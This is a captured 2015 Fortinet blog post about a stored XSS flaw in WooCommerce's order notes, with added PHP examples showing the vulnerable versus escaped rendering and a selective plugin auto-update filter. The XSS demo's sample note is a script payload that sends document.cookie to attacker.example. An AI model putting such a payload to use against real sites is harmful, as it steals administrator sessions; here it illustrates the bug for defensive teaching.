Fortinet Blog | Another XSS Vulnerability In a WordPress Plugin? Is It Time To Worry About WordPress? (captured 3/25/2015)
http://blog.fortinet.com/post/another-xss-vulnerability-in-a-wordpress-plugin-is-it-time-to-worry-about-wordpress
by Chris Dawson (/author/chris-dawson) | March 24, 2015 | Category: Industry Trends & News (/category/industry-trends-news)
Another XSS Vulnerability In a WordPress Plugin? Is It Time To Worry About WordPress?
As FortiGuard Labs discloses another WordPress Plugin XSS vulnerability, it’s time to think about CMS security.
According to W3Techs, WordPress powers nearly 24% of all websites. There are good reasons that it enjoys close to a 61% market share among content management systems:
It is incredibly easy to set up and use
It is actively maintained and updated
A huge user community is there for support even if you don’t pay a host or service provider to support it
The ability to easily customize and extend it with plugins, themes, etc. (many of them free and/or open source) is absolutely unparalleled.
Of course, that kind of market share gets a lot of attention from hackers: find a vulnerability in WordPress core or in one of its popular plugins and you have found your way into potentially millions of websites. Last week, FortiGuard Labs disclosed (http://blog.fortinet.com/post/cross-site-scripting-vulnerability-discovered-in-wordpress-photo-gallery-plugin) a cross-site scripting (XSS) vulnerability in the most popular photo gallery plugin for WordPress. Today, they are disclosing another XSS vulnerability, this time in the most popular ecommerce plugin for the CMS, WooCommerce (https://wordpress.org/plugins/woocommerce/).
In the case of the WooCommerce vulnerability, any website visitor who can place an order can potentially exploit it by entering a crafted string in the Order Notes field at checkout. The note is saved with the order, so this is a stored (persistent) XSS: an administrator who later opens that order in the WordPress dashboard is likely to execute whatever script was injected, and it runs with the privileges of their logged-in admin session. With over 1 million active installations, WooCommerce is obviously a high-profile target.
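To make the class of bug concrete, here is an added illustration (not WooCommerce's code, and not from the Fortinet post): a small PHP simulation of an order-notes field rendered to an administrator, first without output escaping and then with it. The function names, the in-memory order store and the sample note are all constructed for the demo. The point a practitioner should take from it is that the fix belongs at output time, because the note must be stored exactly as the customer typed it; in WordPress the equivalent of the htmlspecialchars() call is esc_html().

```php
<?php
declare(strict_types=1);

// Added example: stored XSS through an order-notes field, vulnerable vs. hardened
// rendering. Illustrative code only; the function names and the in-memory
// "database" are assumptions made for the demo, not WooCommerce's implementation.

// Constructed sample input: what an attacker types into the notes box at checkout.
const ATTACKER_NOTE = 'Please leave at the door <script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Simulated persistence: the note is stored verbatim with the order, as typed.
function store_order(array &$orders, string $customer_note): int
{
    $orders[] = ['customer_note' => $customer_note];
    return count($orders) - 1; // order id
}

// VULNERABLE: the saved note is interpolated into the admin page unescaped,
// so the <script> executes in the administrator's browser when the order is viewed.
function render_order_notes_vulnerable(array $order): string
{
    return '<div class="order-notes">' . $order['customer_note'] . '</div>';
}

// HARDENED: HTML-encode at output time. ENT_QUOTES also encodes both quote
// characters, so the same value is safe inside an attribute value as well.
function render_order_notes_hardened(array $order): string
{
    $safe = htmlspecialchars($order['customer_note'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="order-notes">' . $safe . '</div>';
}

// Cheap regression check for this demo: does a live <script tag survive rendering?
function contains_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$orders = [];
$id = store_order($orders, ATTACKER_NOTE);

$vuln = render_order_notes_vulnerable($orders[$id]);
$safe = render_order_notes_hardened($orders[$id]);

echo "vulnerable output: " . $vuln . PHP_EOL;
echo "hardened output:   " . $safe . PHP_EOL;
echo "vulnerable contains live script: " . var_export(contains_live_script($vuln), true) . PHP_EOL;
echo "hardened contains live script:   " . var_export(contains_live_script($safe), true) . PHP_EOL;
```

Run it with `php stored_xss_demo.php`: the first render still carries the `<script>` tag, the second carries `&lt;script&gt;` and the browser renders the note as text. Escaping on input instead (or stripping tags when the note is saved) is the tempting shortcut, but it corrupts legitimate notes and misses every other path the stored value takes to a page, so escape at each output point, choosing the escaper for that context (HTML body, attribute, URL, JavaScript).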
The developer, WooThemes, patched the vulnerability earlier this month, within a day of being notified by FortiGuard. Users of version 2.3.6 and above are already protected. As with the Photo Gallery vulnerability disclosed last week, though, an alarming number of sites are still running older versions rather than the latest release (2.3.7 as of this writing).
There are many reasons why site administrators don't upgrade their plugins immediately. In some cases, upgrades can break third-party extensions or customizations to the plugins. In fact, another WordPress plugin, Advanced Automatic Updates (https://wordpress.org/plugins/automatic-updater/), which is designed to automatically update plugins, themes, etc., notes:

"While this will be useful for the vast majority of sites, please exercise caution, particularly if you have any custom themes or plugins running on your site."
More often than not, though, plugins don't get updated simply because WordPress lends itself to a "set it and forget it" mentality. Get everything working, install the extra bits you need, and go on about running your business, not worrying about your website. This ease of use and overall reliability is fantastic for WordPress users, but the false sense of security it creates is a recipe for disaster.
That's the real message here. You don't need to stop using WordPress. It isn't time to dump your website and run for another CMS (or go back to the dark ages of hand coding websites and building them from scratch). But it's critical that website administrators be absolutely vigilant about updates to the core CMS and all of their plugins and extensions. If you've customized your WordPress installation (or your install of any CMS, for that matter) to the point that updates will break your website, it's time to rethink your approach. And if you just don't check that updates page in the administrator console very often, you should.
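One way to act on this without handing every update over to the background updater is to opt only specific plugins in. The following must-use plugin is an added example, not the Advanced Automatic Updates plugin's code and not from the Fortinet post; it relies on WordPress core's auto_update_plugin filter (in core since WordPress 3.7), and the list of plugin slugs is an assumption chosen for illustration.

```php
<?php
/*
Plugin Name: Selective plugin auto-updates (added example)
Description: Opt named plugins into WordPress core's background updater; leave the rest on the site's default policy.
*/

// Added example, not the code of any plugin named in the post. Place this file in
// wp-content/mu-plugins/ so it loads before ordinary plugins and cannot be disabled
// from the dashboard. The slugs below are assumptions for the demo: they are the
// directory names of plugins hosted on wordpress.org.

add_filter('auto_update_plugin', function ($update, $item) {
    // Plugins that accept untrusted visitor input and ship security releases:
    // let core apply their updates in the background as soon as they are published.
    $always_update = ['woocommerce', 'photo-gallery'];

    // $item is the update record from the wordpress.org API; slug may be absent for
    // plugins that are not hosted there, so check before reading it.
    if (isset($item->slug) && in_array($item->slug, $always_update, true)) {
        return true;
    }

    // Everything else keeps whatever core or other filters already decided, so a
    // heavily customized plugin is not replaced under you.
    return $update;
}, 10, 2);
```

The callback is consulted once per plugin each time the background updater runs, so the allowlist gives you the "set it and forget it" convenience for the plugins most exposed to attackers while the caution quoted above still applies to the customized ones, which you update by hand after testing.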
Patches are frequently available before an exploit becomes widely known: security researchers notify developers quickly when they discover vulnerabilities, and good developers respond with prompt updates. The longer a vulnerability goes unpatched on your site, though, the more time attackers have to learn about it and exploit it.

Content management systems like WordPress have put professional websites within reach of just about everyone. However, that means that just about everyone needs to start thinking like a security-savvy sysadmin and keep their website up to date and fully patched. Clearly, hackers are counting on you to forget about that all-important updates page.
Tags: fortiguard labs, vulnerability, xss, wordpress, wordpress plugins, w3tech, woothemes, automatic updates, plugins